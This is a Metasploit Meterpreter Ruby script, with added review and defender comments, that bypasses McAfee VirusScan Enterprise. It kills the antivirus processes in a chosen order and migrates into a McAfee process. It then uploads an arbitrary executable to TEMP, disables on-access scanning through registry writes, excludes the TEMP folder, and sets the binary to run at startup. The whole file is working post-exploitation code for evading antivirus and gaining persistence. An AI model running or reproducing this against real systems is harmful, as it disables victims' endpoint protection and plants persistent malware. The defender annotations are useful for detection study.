GitHub Repository: rapid7/metasploit-framework
Path: blob/master/scripts/meterpreter/virusscan_bypass.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##


# Meterpreter script that kills McAfee VirusScan Enterprise v8.7.0i+ processes in a "magic"
# order which keeps the VirusScan icon visible in the system tray without a disabled sign on it.
# Additionally it lets you disable the On Access Scanner via the registry, upload a binary that
# would otherwise be detected to the TEMP folder, add that folder to the VirusScan exclusion list
# and register the binary under the CurrentVersion\Run key. (Requires administrator privilege.
# Tested on XP SP3)
#
# Credits: hdm, jduck, Jerome Athias (borrowed some of their code)
#
# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com

# Alias the live Meterpreter session so the helper below can receive it as an argument.
session = client

# Option table for this script: -h and -k take no value, -e takes the path of
# the local executable to upload.
script_options = {
"-h" => [ false, "Help menu." ],
"-k" => [ false, "Only kills VirusScan processes" ],
"-e" => [ true, "Executable to upload to target host. (modifies registry and exclusion list)" ]
}
@@exec_opts = Rex::Parser::Arguments.new(script_options)

################## function declarations ##################
# Print the author banner, a short description of the script and the option table.
# Relies on print_line and @@exec_opts being available in the script's scope.
def usage()
banner = [
"\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com",
"----------------------------------------------------------------------------------------------",
"Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it",
"to exclusion list and set it to run at startup. (Requires administrator privilege)",
"----------------------------------------------------------------------------------------------"
]
banner.each { |line| print_line line }
print_line(@@exec_opts.usage)
end

# Remote-side state filled in by upload(): @path holds the full path of the
# uploaded file on the target, @location the target's TEMP directory. Both are
# read again by the registry section at the end of the script.
@path, @location = "", ""

# Uploads a local file to the target's TEMP directory under a randomised name.
#
# @param session the Meterpreter session used for getenv and the file upload
# @param file [String] local path of the file to upload; must exist
# @param trgloc unused - the only call site in this script passes "" and the
#   destination is always taken from the target's TEMP variable
# @return [String, nil] the remote path chosen for the file; nil only if an
#   exception is raised before fileontrgt is assigned
# @raise [RuntimeError] when the local file does not exist
#
# Side effects: sets @location (remote TEMP dir) and @path (remote file path),
# both read later by the registry section of this script.
def upload(session,file,trgloc)
if not ::File.exist?(file)
raise "File to Upload does not exist!"
else
@location = session.sys.config.getenv('TEMP')
begin
# scan with a capture group returns nested arrays; join collapses a match to ".exe".
# NOTE(review): the dot in (.exe) is unescaped, and when the name does not end in
# .exe the else branch interpolates the raw scan result array into the file name.
ext = file.scan(/\S*(.exe)/i)
if ext.join == ".exe"
# Artifact: the remote file is always named MS<0-99>.exe inside TEMP.
fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
else
fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
end
@path = fileontrgt
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status("Uploaded as #{fileontrgt}")
# NOTE(review): ::Exception also catches Interrupt/SystemExit. A failure is only
# printed; the remote path is still returned and stays in @path as if the
# upload had succeeded, so the caller cannot tell the two cases apart.
rescue ::Exception => e
print_status("Error uploading file #{file}: #{e.class} #{e}")
end
end
return fileontrgt
end

#parsing of Options
# -e sets the local file to upload, -k restricts the run to killing processes.
file = ""
# NOTE(review): helpcall is assigned for -h but never read anywhere in this
# script; usage is only reached through the empty-file check below, so
# "-k -h" prints nothing.
helpcall = 0
killonly = 0
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-e"
file = val || ""
when "-h"
helpcall = 1
when "-k"
killonly = 1
end

}

# Without -k an executable is mandatory: show usage and stop the script.
if killonly == 0
if file == ""
usage
raise Rex::Script::Completed
end
end

# Magic kill order :)
# Process names the script treats as VirusScan Enterprise components, listed in
# the order they are terminated further down. Defender note: this fixed set of
# names and the termination sequence are an observable pattern in process telemetry.
avs = %W{
shstat.exe
engineserver.exe
frameworkservice.exe
naprdmgr.exe
mctray.exe
mfeann.exe
vstskmgr.exe
mcshield.exe
}

# Number of listed processes found running on the target.
av = 0

plist = client.sys.process.get_processes()
plist.each do |x|
# Process names are lower-cased before lookup; the avs entries are already lower-case.
if (avs.index(x['name'].downcase))
av = av + 1
end
end


# At least seven of the eight names must be running to continue; otherwise
# VirusScan is treated as absent and the script stops here.
if av > 6
print_status("VirusScan Enterprise v8.7.0i+ is running...")
else
print_status("VirusScan Enterprise v8.7.0i+ is not running!")
raise Rex::Script::Completed
end

# Migrate the session into mfevtps.exe before any process is killed.
target_pid = nil
# NOTE(review): target is not assigned anywhere earlier in this script, so
# ||= is effectively a plain assignment here.
target ||= "mfevtps.exe"

print_status("Migrating to #{target}...")

# Get the target process pid
target_pid = client.sys.process[target]

# Stop if the process cannot be resolved (nil pid).
if not target_pid
print_error("Could not access the target process")
raise Rex::Script::Completed
end

print_status("Migrating into process ID #{target_pid}")
# Defender note: migration into a vendor process is a cross-process event that
# endpoint telemetry can surface.
client.core.migrate(target_pid)

target_pid = nil

# Both branches terminate the avs processes in list order; the -k branch stops
# there, the default branch continues with the upload and the registry changes.
# NOTE(review): the two kill loops below are identical.
if killonly == 1
avs.each do |x|
# Get the target process pid
target_pid = client.sys.process[x]
print_status("Killing off #{x}...")
# NOTE(review): target_pid is nil when the name is not found and kill is still
# called; what kill(nil) does is not visible from this script.
client.sys.process.kill(target_pid)
end
else
avs.each do |x|
# Get the target process pid
target_pid = client.sys.process[x]
print_status("Killing off #{x}...")
client.sys.process.kill(target_pid)
end

# Upload it (the third argument is ignored by upload; the destination is TEMP).
# NOTE(review): exec is never read afterwards; the Run key below uses @path instead.
exec = upload(session,file,"")

# Initialize vars
key = nil
value = nil
data = nil
type = nil

# Mcafee registry key
# Defender note: the five values written under this key (bScanIncoming,
# bScanOutgoing, ApplyNVP, NumExcludeItems, ExcludedItem_0) and the "MS" value
# written under the HKLM Run key at the end are the persistent artifacts of this
# script; monitoring writes to these keys is the straightforward detection.
key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'

# Split the key into its parts
root_key, base_key = client.sys.registry.splitkey(key)

# Disable when writing to disk option
value = "bScanIncoming"
data = 0
type = "REG_DWORD"
# NOTE(review): the key is re-opened for every value below and no handle is ever closed.
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, client.sys.registry.type2str(type), data)
print_status("Successful set #{key} -> #{value} to #{data}.")

# Disable when reading from disk option
value = "bScanOutgoing"
data = 0
type = "REG_DWORD"
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, client.sys.registry.type2str(type), data)
print_status("Successful set #{key} -> #{value} to #{data}.")

# Disable detection of unwanted programs
value = "ApplyNVP"
data = 0
type = "REG_DWORD"
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, client.sys.registry.type2str(type), data)
print_status("Successful set #{key} -> #{value} to #{data}.")

# Increase the number of excluded items
value = "NumExcludeItems"
data = 1
type = "REG_DWORD"
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, client.sys.registry.type2str(type), data)
print_status("Successful set #{key} -> #{value} to #{data}.")

# Add executable to excluded item folder
value = "ExcludedItem_0"
# @location was set by upload(); per the header comment the whole TEMP folder is
# excluded, not only the uploaded file.
data = "3|3|" + @location
type = "REG_SZ"
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, client.sys.registry.type2str(type), data)
print_status("Successful set #{key} -> #{value} to #{data}.")

# Set registry to run executable at startup
key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
# Split the key into its parts
root_key, base_key = client.sys.registry.splitkey(key)
value = "MS"
# @path was set by upload() (and is still set even if that upload failed).
data = @path
# NOTE(review): type is not reassigned here, so this write relies on the "REG_SZ"
# left over from the ExcludedItem_0 step above - statement order matters.
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, client.sys.registry.type2str(type), data)
print_status("Successful set #{key} -> #{value} to #{data}.")
end

print_status("Finished!")
